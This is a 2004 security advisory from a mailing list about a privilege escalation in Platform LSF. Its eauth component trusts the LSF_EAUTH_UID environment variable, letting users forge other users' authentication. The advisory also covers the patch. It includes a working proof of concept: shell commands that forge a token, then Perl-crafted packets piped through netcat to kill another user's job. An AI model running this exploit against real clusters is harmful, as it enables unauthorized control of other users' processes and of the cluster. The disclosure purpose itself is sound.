[UNIX] LSF Cluster Remote Privileges Escalation

From: SecuriTeam (support_at_securiteam.com)
Date: 02/26/04

  • Next message: SecuriTeam: "[UNIX] LSF eauth Vulnerability Leads to Remote Code Execution (LSF_From_PC)" 
    To: list@securiteam.com
Date: 26 Feb 2004 11:57:54 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      LSF Cluster Remote Privileges Escalation
    ------------------------------------------------------------------------

    SUMMARY

    "eauth" a component within <http://www.platform.com/> LSF (Load Sharing
    Facility) that controls authentication, can be exploited to send commands
    to LSF on behalf of a different user. In this way a user could submit and
    control jobs on behalf of other users. This security risk is contained to
    "local cluster". This means that it can be exploited remotely (from one
    host to another) but only between hosts within the LSF cluster.

    DETAILS

    Vulnerable Systems:
     * Load Sharing Facility versions 4.x, 5.x, 6.x

    "eauth" has a very dangerous undocumented feature. Namely, during its
    execution, it is checking for LSF_EAUTH_UID environment variable. If it
    finds it, it is using it instead of the real UID of the user which invoked
    "eauth" binary. This way attacker is able to generate authentication
    string of any user in the system. It can be used to control processes on
    behalf of other users in the cluster. Moreover, as such authentication
    string is used for some administrative commands, attacker is able to
    control the cluster itself.

    In order to steal other user's process attacker needs to know
    authentication data for that user. In most cases she will need just
    "lsfadmin" authentication data, because this user can control other user's
    processes, but let's say she wants to steal process from user "cadence".

    $cat /etc/passwd|grep cadence
    cadence:x:500:500:Tomasz Grabowski:/home/cadence:/bin/bash
    $ export LSF_EAUTH_UID=500
    $ eauth -c hostname
    ,',0/%+-$%$&&,/)

    Exploit:
    Now, she needs to send packets. She can do it, for the sake of simplicity,
    using Perl and NetCat software:
    (# first packet
    perl -e 'print "\x04\x00\x00\x00\x0d\x00\x00\x00\x00\x00\x00\x00";
    print "\x00\x00\x00\x00";
    '
    sleep 1;

    #let's call it a header, packet length
    perl -e 'print "\x00\x04\x00\x00\x0d\x00\x00\x00\x00\x00\x00\x40";
    #below we provide UID, GID and length of user name
    print "\x00\x00\x00\x00\x00\x00\x03\xee\x00\x00\x03\xee\x00\x00\x00\x07";
    #below is the user name, end indicator, and probably auth data field
    length
    print "\x63\x61\x64\x65\x6e\x63\x65\x00\x00\x00\x00\x03\x00\x00\x00\x10";
    #again authentication length and auth data itself
    print "\x00\x00\x00\x10\x2a\x30\x26\x24\x21\x25\x2e\x23\x2c\x23\x27\x2d";
    #rest of auth data, end indicator, question code (x09 - bkill) and process
    number
    print "\x2f\x28\x2b\x25\x00\x00\x00\x02\x00\x00\x00\x09\x00\x00\x00\x77";
    print "\x00\x00\x00\x00";
    '
    #send it to the target daemon
    ) | nc 192.168.10.106 6881

    After sending these two packets, she will kill process number 119
    belonging to user "cadence".

    How to patch:
    This problem has been directly addressed in a security patch released for
    LSF. The fix is contained to the "eauth" binary which will need to be
    replaced for each platform used in the cluster. The patch can be
    downloaded from Platform FTP site.

    FTP: ftp.platform.com
    Path: patches/<version>/os/<os>/eauth*
    Example: patches/5.1/os/sparc-sol7-64/eauth5.1_sparc-sol7-64.Z

    If the OS or version is not currently available, it can be built on
    demand. Please contact Platform Technical Support if you have any
    questions or concerns. Phone: 1-877-444-4573 or Email:
    support@platform.com

    References:
    This bug was confirmed in Platform's official security advisory dated 9
    Feb 2004. It is accessible directly from Platform as Knowledge Base
    Article KB1-5T4XV.

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:cadence@aci.com.pl> Tomasz
    Grabowski.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[UNIX] LSF eauth Vulnerability Leads to Remote Code Execution (LSF_From_PC)"

    Relevant Pages